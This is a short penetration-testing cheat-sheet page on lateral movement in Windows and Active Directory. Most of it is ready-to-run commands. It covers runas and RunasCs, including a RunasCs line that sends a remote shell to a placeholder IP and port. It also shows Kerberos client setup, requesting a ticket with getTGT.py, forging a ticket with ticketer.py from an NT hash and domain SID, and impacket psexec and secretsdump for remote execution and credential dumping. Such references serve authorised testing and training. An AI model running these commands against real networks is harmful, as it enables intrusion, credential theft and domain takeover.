Lateral Movement

RunAs

Use the runas command to execute commands on behalf of another user on the same host.

runas /user:<USER> <COMMAND, ex. cmd>
# or 
Start-Process cmd.exe -Verb runAs

You can also use RunasCs.ps1 or RunasCs.exe to access a user who does not have remote access authorization via another user who does have it

Import-Module .\Invoke-RunasCs.ps1
Invoke-RunasCs <USER> <PASS> "cmd /c whoami /all"

.\RunasCs.exe <USER> <PASS> "cmd.exe -r <IP>:<PORT>"

Kerberos Tickets

Set /etc/hosts and /etc/krb5.conf

/etc/hosts

<IP>     <DOMAIN.COM> <DC.DOMAIN.COM>

/etc/krb5.conf

[libdefaults]
  default_realm = <DOMAIN.COM>
  forwardable = yes
  dns_lookup_kdc = false
  dns_lookup_realm = false

[realms]
  <DOMAIN.COM> = {
    kdc = <DC.DOMAIN.COM>
  }

Get the TGT

getTGT.py -dc-ip <IP> '<DOMAIN.COM>/<USER>:<PASS>'
ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> <NEW_USER>
# or with other techniques

Import it

chmod 600 <USER>.ccache
export KRB5CCNAME=<USER>.ccache
klist

Use with Kerberos authentication (-k)

impacket-smbclient.py -k <DC.DOMAIN.COM>
impacket-psexec.py <DOMAIN>/<USER>@<IP> -k -no-pass
# also with impacket-secretsdump, impacket-wmiexec, etc.

Last updated 1 month ago

Was this helpful?